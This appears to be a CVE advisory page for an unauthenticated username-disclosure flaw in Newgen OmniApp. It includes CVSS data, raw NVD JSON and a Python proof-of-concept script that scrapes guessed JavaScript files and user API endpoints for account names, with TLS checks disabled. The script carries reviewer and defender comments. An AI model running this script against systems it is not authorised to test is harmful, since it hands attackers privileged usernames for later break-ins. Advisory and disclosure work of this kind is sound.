Security Vulnerability Report
CVE-2025-69908 CVSS 7.5 HIGH

CVE-2025-69908

Published: 2026-01-23 16:15:52
Last Modified: 2026-02-11 19:42:40

Description

An unauthenticated information disclosure vulnerability in Newgen OmniApp allows attackers to enumerate valid privileged usernames via a publicly accessible client-side JavaScript resource.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:newgensoft:omniapp:-:*:*:*:*:*:*:* - VULNERABLE
Newgen OmniApp (all versions, until a patch is released)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
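import re
import sys

import requests

# CVE-2025-69908 PoC - Newgen OmniApp Username Enumeration
# Description: Unauthenticated information disclosure via accessible JavaScript resources
#
# NOTE(review): the resource paths and API endpoints probed below are generic
# guesses. The CVE description on this page only says "a publicly accessible
# client-side JavaScript resource" and does not name it, so a clean run of this
# script does not show that a deployment is unaffected.
#
# NOTE(review): the regexes match any e-mail-like string or `user`/`username`
# token in the fetched JavaScript, so every hit is a candidate that needs
# manual confirmation, not a verified account name.
#
# Defender view: in web-server access logs this script shows up as a single
# client issuing unauthenticated GETs for the paths listed below, in order.
# The underlying fix is to stop shipping account names in JavaScript that is
# served before login; login throttling and MFA reduce the value of any names
# that have already been exposed.


def exploit_cve_2025_69908(target_url):
    """Fetch candidate JavaScript resources and collect username-like strings.

    Requests a fixed list of JavaScript paths under ``target_url``, applies a
    set of regexes to each 200 response, and prints every new match. It then
    requests a fixed list of user-listing endpoints and prints any JSON body
    returned with status 200.

    Args:
        target_url: Base URL of the OmniApp instance; a trailing slash is
            stripped before paths are appended.

    Returns:
        List of distinct regex matches, in the order they were first seen.
        Only matches from the JavaScript resources are included; data printed
        from the user-listing endpoints is not added to the list.
    """
    print(f"[*] Target: {target_url}")
    print("[*] Exploiting CVE-2025-69908...")

    base_url = target_url.rstrip('/')

    # Common JavaScript resource paths in Newgen OmniApp
    # NOTE(review): unverified; see the header note.
    js_paths = [
        "/static/js/app.js",
        "/static/js/vendor.js",
        "/assets/js/main.js",
        "/scripts/app.js",
        "/webapp/js/common.js",
        "/omniapp/js/validation.js"
    ]

    # Search for username patterns in JavaScript
    # Common patterns: usernames, email-like strings, user IDs
    # Defined once here because the list does not depend on the path checked.
    patterns = [
        r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}',  # Email patterns
        r'user["\':\s]+([a-zA-Z0-9_]+)',  # user: "username"
        r'username["\':\s]+([a-zA-Z0-9_]+)',
        r'"(admin|root|superuser|manager)"',  # Privileged usernames
        r'userId["\':\s]+([0-9]+)',
    ]

    discovered_users = []

    for js_path in js_paths:
        url = base_url + js_path
        print(f"\n[*] Checking: {url}")

        try:
            # NOTE(review): verify=False turns off TLS certificate validation,
            # so the response is not authenticated and could come from an
            # on-path party. Prefer a proper CA bundle when auditing your own
            # deployment.
            response = requests.get(url, timeout=10, verify=False)

            if response.status_code == 200:
                content = response.text

                for pattern in patterns:
                    matches = re.findall(pattern, content, re.IGNORECASE)
                    for match in matches:
                        if match not in discovered_users:
                            discovered_users.append(match)
                            print(f"[+] Found potential username: {match}")

                # Check for API endpoints that might reveal usernames
                api_patterns = re.findall(r'["\'](/api/[^"\']+)["\']', content)
                if api_patterns:
                    print(f"[i] Discovered API endpoints: {api_patterns[:5]}")

        except requests.exceptions.RequestException as e:
            print(f"[-] Error accessing {url}: {e}")

    # Try enumeration endpoint if discovered
    # NOTE(review): despite the comment above, these endpoints are a fixed
    # list and are requested unconditionally.
    enum_endpoints = [
        "/api/users",
        "/api/v1/users/list",
        "/services/userService/getUsers"
    ]

    for endpoint in enum_endpoints:
        url = base_url + endpoint
        print(f"\n[*] Testing enumeration endpoint: {url}")

        try:
            response = requests.get(url, timeout=10, verify=False)
            if response.status_code == 200:
                data = response.json()
                print(f"[+] Potential user data: {data}")
        except (requests.exceptions.RequestException, ValueError) as e:
            # Was a bare `except: pass`, which also swallowed KeyboardInterrupt
            # and hid every failure. ValueError covers a non-JSON 200 body.
            print(f"[-] Error accessing {url}: {e}")

    print(f"\n[*] Total discovered users: {len(discovered_users)}")
    for user in discovered_users:
        print(f" - {user}")

    return discovered_users


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} https://vulnerable-server.com")
        sys.exit(1)

    target = sys.argv[1]
    exploit_cve_2025_69908(target)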

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69908", "sourceIdentifier": "[email protected]", "published": "2026-01-23T16:15:52.453", "lastModified": "2026-02-11T19:42:40.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unauthenticated information disclosure vulnerability in Newgen OmniApp allows attackers to enumerate valid privileged usernames via a publicly accessible client-side JavaScript resource."}, {"lang": "es", "value": "Una vulnerabilidad de revelación de información no autenticada en Newgen OmniApp permite a los atacantes enumerar nombres de usuario válidos con grandes privilegios a través de un recurso JavaScript del lado del cliente de acceso público."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:newgensoft:omniapp:-:*:*:*:*:*:*:*", "matchCriteriaId": "BFF418D8-F9AF-4E2A-B16E-578A20319107"}]}]}], "references": [{"url": "https://github.com/CBx216/CVE-Newgen-Software-Advisories/blob/main/CVE-2025-69908.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://newgensoft.com/", "source": "[email protected]", "tags": ["Product"]}]}}